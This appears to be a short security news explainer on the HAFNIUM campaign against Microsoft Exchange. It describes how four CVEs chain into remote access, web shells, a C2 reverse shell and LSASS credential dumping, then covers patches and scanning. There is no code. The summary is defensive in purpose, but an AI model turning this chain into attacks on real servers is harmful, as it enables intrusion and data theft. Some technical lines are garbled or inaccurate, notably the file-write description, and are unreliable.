Microsoft Exchange Servers Exploitation
Microsoft Exchange servers based on the Windows platform let employees of businesses communicate among themselves, and with others outside through various means. These servers are reported to have four zero-day vulnerabilities, which are now being exploited by a Chinese state-backed hacker group called HAFNIUM, for stealing the email data of companies. Remote hackers targeting Exchange servers should exploit the following vulnerabilities to gain remote access,
CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server. CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service, which lets the attacker run code as SYSTEM on the Exchange server. CVE-2021-26858 and CVE-2021-27065 are arbitrary files that write vulnerabilities in Exchange, that let attackers authenticate with the Exchange server.
All these four exploits can be chained together to gain remote access to the company’s Exchange servers, and use them for installing a web shell for uploading additional files, stealing data to emails and make backdoors. Microsoft has detected that the HAFNIUM group is using virtual private servers based in the US for their attacks. besides stealing data, they can create a remote shell back to their C2 for internal access, and also dump the memory of LSASS.exe to get any cached credentials. Microsoft has released security patches for all four of these vulnerabilities and recommends users install them immediately for avoiding attacks. Users can use Nmap, a script made by Microsoft’s Senior Threat Intelligence Analyst Kevin Beaumont to scan for vulnerable Microsoft Exchange servers. Updating servers with the latest patch require them to support the Update Rollup and Cumulative Update. Read more about securing your Exchange servers here.